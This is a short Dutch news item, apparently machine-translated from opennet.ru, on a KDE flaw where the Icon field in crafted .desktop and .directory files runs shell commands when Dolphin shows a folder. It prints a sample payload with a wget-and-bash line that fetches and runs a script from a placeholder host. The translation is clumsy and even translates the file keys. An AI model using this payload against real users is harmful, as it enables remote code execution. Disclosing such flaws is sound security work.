In KDE , waarmee een aanvaller willekeurige opdrachten kan uitvoeren wanneer een gebruiker een map of archief bekijkt met speciaal ontworpen “.desktop”- en “.directory”-bestanden. Een aanval vereist dat de gebruiker eenvoudigweg een lijst met bestanden bekijkt in de Dolphin-bestandsbeheerder, een kwaadaardig bureaubladbestand downloadt of een snelkoppeling naar het bureaublad of naar een document sleept. Het probleem manifesteert zich in de huidige versie van bibliotheken en oudere versies, tot KDE 4. De kwetsbaarheid is nog steeds aanwezig (CVE niet toegewezen).
Het probleem wordt veroorzaakt door een onjuiste implementatie van de klasse KDesktopFile, die, bij het verwerken van de variabele “Icon”, zonder de juiste escape-codes, de waarde doorgeeft aan de functie KConfigPrivate::expandString(), die de uitbreiding van speciale shell-tekens uitvoert, inclusief de verwerking de strings “$(..)” als uit te voeren commando's . In tegenstelling tot de vereisten van de XDG-specificatie, implementatie shell-constructies worden geproduceerd zonder het type instellingen te scheiden, d.w.z. niet alleen bij het bepalen van de opdrachtregel van de te starten applicatie, maar ook bij het opgeven van de pictogrammen die standaard worden weergegeven.
Om aan te vallen bijvoorbeeld stuur de gebruiker een zip-archief met een map die een “.directory”-bestand bevat, zoals dit:
[Bureaubladinvoer]
Type=Map
Icoon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Wanneer u de inhoud van het archief probeert te bekijken in Dolphin bestandsbeheer, zal het script https://example.com/FILENAME.sh worden gedownload en uitgevoerd.
Bron: opennet.ru